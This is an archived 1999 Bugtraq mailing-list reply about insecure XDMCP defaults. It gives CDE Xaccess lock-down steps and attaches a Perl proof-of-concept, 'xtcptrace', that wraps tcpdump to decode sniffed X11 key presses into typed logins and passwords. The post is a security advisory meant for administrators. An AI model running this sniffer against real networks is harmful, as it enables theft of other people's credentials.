Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: XDM Insecurity revisited

From: plonka () DOIT WISC EDU (Dave Plonka)
Date: Thu, 19 Aug 1999 11:55:49 -0500

On Wed, Aug 18, 1999 at 12:26:20PM +0200, Jochen Bauer wrote:

On Wed, 26 Nov 1997 Eric Augustus (augustus () stic net) posted a message
on BUGTRAQ about the fact, that the default Xaccess file allows XDMCP
connections from any host. As you know, this can be used to get a
login screen on any host and therefore get around access control
mechanisms like tcpwrapper and root login restriction to the console.

However, this warning seemed to have little effect as (at least)
Digital Unix 4.0E, SuSE Linux 6.1 and Red Hat Linux 6.0 are still
(1.5 years later) shipped with this default Xaccess file.

<snip>
and with CDE on our Solaris 2.6 machines as well.  (I haven't checked
CDE under 2.7 yet.)

I agree that this reminder about locking-down X login is justified...

Sys admins who shut-out clear text-based logins (such as telnet) in
favor of ssh, for instace, should also be limiting X logins as well,
since it's nearly as easy to sniff and decode the raw X events to
derive the clear-text logins and passwords.

See the attached "proof of concept" script that I used to demonstrate
this to admins who were under the impression that X-based logins were
somehow secure from login/password sniffing.  It's a quick hack but
worked with an XFree86 server logging in via Solaris 2.6 dtlogin. YMMV.
(I.e. please don't tell me that it doesn't work - it was written for
one-time use... the X KeyCodes in the script can be modified for your
target X server.)  The script arguments are just passed allong to
tcpdump, so usage is something like:

   $ xtcptrace src xterminal and dst loginhost

Secondly, for CDE environments such as Solaris, which use an xdm-derived
model, here's a bit of detail about how folks can restrict X login access:

1) If "/etc/dt/config/Xaccess" doesn't exist, copy it from "/usr/dt/config".
   Comment-out this line (as show here) of "/etc/dt/config/Xacccess":

   #*               CHOOSER BROADCAST       #any indirect host can get a chooser

   Then you can add specific X servers by hostname or IP address at the
   end of the "Xaccess" file.

2) send SIGHUP to the *parent* dtlogin daemon process.

For further details see the section labeled "The Xaccess File" in the
dtlogin(1) man page.

Dave

--
plonka () doit wisc edu  http://net.doit.wisc.edu/~plonka  ARS:N9HZF  Madison, WI


#! /usr/local/bin/perl

# xtcptrace - a tcpdump "wrapper" to decode X KeyCodes
# Dave Plonka <plonka () doit wisc edu>, Aug 27  1998

$tcpdump='/path/to/tcpdump';

if (! -x ${tcpdump}) {
   print STDERR "You don't seem to have execute permission on \"${tcpdump}\".\n";
   exit 1
}

# X KeyCodes...  These can be determined using xkeycaps(1), for example.
# I assume these are well documented somewhere.
# Remember we're watching key presses here, not the resulting X KeySym or
# ASCII character.  So a '[SHIFT]' preceeding an 'A' is probably a capital
# letter A, etc.
%code = (
0x0A => '1', 0x0B => '2', 0x0C => '3', 0x0D => '4',
0x0E => '5', 0x0F => '6', 0x10 => '7', 0x11 => '8',
0x12 => '9', 0x13 => '0', 0x26 => 'A', 0x38 => 'B',
0x36 => 'C', 0x28 => 'D', 0x1A => 'E', 0x29 => 'F',
0x2A => 'G', 0x2B => 'H', 0x1F => 'I', 0x2C => 'J',
0x2D => 'K', 0x2E => 'L', 0x3A => 'M', 0x39 => 'N',
0x20 => 'O', 0x21 => 'P', 0x18 => 'Q', 0x1B => 'R',
0x27 => 'S', 0x1C => 'T', 0x1E => 'U', 0x37 => 'V',
0x19 => 'W', 0x35 => 'X', 0x1D => 'Y', 0x34 => 'Z',
0x40 => '[ALT]', 0x41 => ' ', 0x42 => '[CAPS LOCK]', 0x32 => '[SHIFT]',
0x24 => '[RETURN]', 0x16 => '[BACK SPACE]',
);

open(STDIN, "${tcpdump} -l -x -s 65535 -v @ARGV|") || die;
select(STDIN); $| = 1;
select(STDOUT); $| = 1;
while (<STDIN>) {
   # This is a total kludge below - we only look at 32 byte packets since
   # that is the size of an xEvent.  However, we may miss some events because
   # they can be grouped together in one packet.  So really, any multiple of
   # 32 (e.g. 64, 96) could also contain xEvents.
   if (m/^\d\d:\d\d:\d\d\.\d+\s+.*\.6000\s+>\s+.*\(32\)/) {
      scalar(<STDIN>); # discard
      scalar(<STDIN>); # discard
      $_ = scalar(<STDIN>);
      # Another kludge - the magic numbers in the line below (0x5018,  0x7d78,
      # etc.) were discovered by watching xEvents with tcpdump(1).  I don't
      # know that they'll have those values from all X servers or what.
      # Probably, the xEvent typedef struct, as defined in <X11/Xproto.h>,
      # should be grokked to implement this correctly.
      # The Right Thing(tm) would probably be to pack the packet content as
      # a 32-byte scalar, then unpack it into it's appropriate structure
      # members.
      if (m/5018\s+7d78\s+[0-9a-f][0-9a-f][0-9a-f][0-9a-f]\s+0000\s+03([0-9a-f][0-9a-f])/) {
         if ($c = $code{hex($1)}) {
            print "$c\n"
         } else {
            print "KeyCode 0x$1\n"
         }
      }
   }
}

exit
Previous By Date Next
Previous By Thread Next

Current thread: